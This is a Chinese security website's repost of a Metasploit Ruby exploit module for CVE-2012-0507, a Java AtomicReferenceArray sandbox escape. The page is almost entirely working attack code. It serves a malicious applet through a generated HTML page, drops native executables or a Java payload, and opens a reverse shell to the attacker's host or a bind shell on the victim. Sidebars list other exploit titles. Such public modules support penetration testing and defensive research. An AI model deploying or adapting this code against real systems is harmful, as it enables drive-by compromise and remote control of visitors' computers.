首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Java AtomicReferenceArray Type Violation Vulnerability
来源:http://www.metasploit.com 作者:sinn3r 发布时间:2012-03-31  

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
 Rank = ExcellentRanking

 include Msf::Exploit::Remote::HttpServer::HTML
 include Msf::Exploit::EXE

 def initialize( info = {} )
  super( update_info( info,
   'Name'           => 'Java AtomicReferenceArray Type Violation Vulnerability',
   'Description'    => %q{
     This module exploits a vulnerability due to the fact that
    AtomicReferenceArray uses the Unsafe class to store a reference in an
    array directly, which may violate type safety if not used properly.
    This allows a way to escape the JRE sandbox, and load additional classes
    in order to perform malicious operations.
   },
   'License'        => MSF_LICENSE,
   'Author'         =>
    [
     'sinn3r',       # metasploit module
     'juan vazquez', # metasploit module
     'egypt'         # special assistance
    ],
   'References'     =>
    [
     ['CVE', '2012-0507'],
     ['BID', '52161'],
     ['URL', 'http://weblog.ikvm.net/PermaLink.aspx?guid=cd48169a-9405-4f63-9087-798c4a1866d3'],
     ['URL', 'http://blogs.technet.com/b/mmpc/archive/2012/03/20/an-interesting-case-of-jre-sandbox-breach-cve-2012-0507.aspx'],
     ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-0507']
    ],
   'Platform'       => [ 'java', 'win', 'osx', 'linux', 'solaris' ],
   'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
   'Targets'        =>
    [
     [ 'Generic (Java Payload)',
      {
       'Platform' => ['java'],
       'Arch' => ARCH_JAVA,
      }
     ],
     [ 'Windows x86 (Native Payload)',
      {
       'Platform' => 'win',
       'Arch' => ARCH_X86,
      }
     ],
     [ 'Mac OS X PPC (Native Payload)',
      {
       'Platform' => 'osx',
       'Arch' => ARCH_PPC,
      }
     ],
     [ 'Mac OS X x86 (Native Payload)',
      {
       'Platform' => 'osx',
       'Arch' => ARCH_X86,
      }
     ],
     [ 'Linux x86 (Native Payload)',
      {
       'Platform' => 'linux',
       'Arch' => ARCH_X86,
      }
     ],
    ],
   'DefaultTarget'  => 0,
   'DisclosureDate' => 'Feb 14 2012'
   ))
 end


 def exploit
  # load the static jar file
  path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-0507.jar" )
  fd = File.open( path, "rb" )
  @jar_data = fd.read(fd.stat.size)
  fd.close

  super
 end


 def on_request_uri( cli, request )
  data = ""
  host = ""
  port = ""
  peer = "#{cli.peerhost}:#{cli.peerport}"

  if not request.uri.match(/\.jar$/i)
   if not request.uri.match(/\/$/)
    send_redirect( cli, get_resource() + '/', '')
    return
   end

   print_status("#{peer} - Sending #{self.name}")

   payload = regenerate_payload( cli )
   if not payload
    print_error("#{peer} - Failed to generate the payload." )
    return
   end

   if target.name == 'Generic (Java Payload)'
    if datastore['LHOST']
     jar  = payload.encoded
     host = datastore['LHOST']
     port = datastore['LPORT']
     vprint_status("Java reverse shell to #{host}:#{port} from #{peer}" )
    else
     port = datastore['LPORT']
     datastore['RHOST'] = cli.peerhost
     vprint_status( "Java bind shell on #{cli.peerhost}:#{port}..." )
    end
    if jar
     print_status( "Generated jar to drop (#{jar.length} bytes)." )
     jar = Rex::Text.to_hex( jar, prefix="" )
    else
     print_error("#{peer} - Failed to generate the executable." )
     return
    end
   else

    # NOTE: The EXE mixin automagically handles detection of arch/platform
    data = generate_payload_exe

    if data
     print_status("#{peer} - Generated executable to drop (#{data.length} bytes)." )
     data = Rex::Text.to_hex( data, prefix="" )
    else
     print_error("#{peer} - Failed to generate the executable." )
     return
    end

   end

   send_response_html( cli, generate_html( data, jar, host, port ), { 'Content-Type' => 'text/html' } )
   return
  end

  print_status( "#{peer} - sending jar..." )
  send_response( cli, generate_jar(), { 'Content-Type' => "application/octet-stream" } )

  handler( cli )
 end

 def generate_html( data, jar, host, port )
  jar_name = rand_text_alpha(rand(6)+3) + ".jar"

  html  = "<html><head></head>"
  html += "<body>"
  html += "<applet archive=\"#{jar_name}\" code=\"msf.x.Exploit.class\" width=\"1\" height=\"1\">"
  html += "<param name=\"data\" value=\"#{data}\"/>" if data
  html += "<param name=\"jar\" value=\"#{jar}\"/>" if jar
  html += "<param name=\"lhost\" value=\"#{host}\"/>" if host
  html += "<param name=\"lport\" value=\"#{port}\"/>" if port
  html += "</applet></body></html>"
  return html
 end

 def generate_jar()
  return @jar_data
 end

end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·HT Editor Spawning Root Shell
·Bitsmith PS Knowbase 3.2.3 - B
·TRENDnet SecurView TV-IP121WN
·MailMax <=v4.6 POP3 "USER" Rem
·Quest InTrust 10.4.x Annotatio
·HT Editor Spawning Root Shell
·D-Link DCS-5605 Network Survei
·Microsoft Windows Media Player
·Quest InTrust 10.4.x ReportTre
·RichTx32.OCX (TextBox Control
·KnFTPd 1.0.0 'FEAT' DoS PoC-Ex
·Denial of Service in FoxPlayer
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved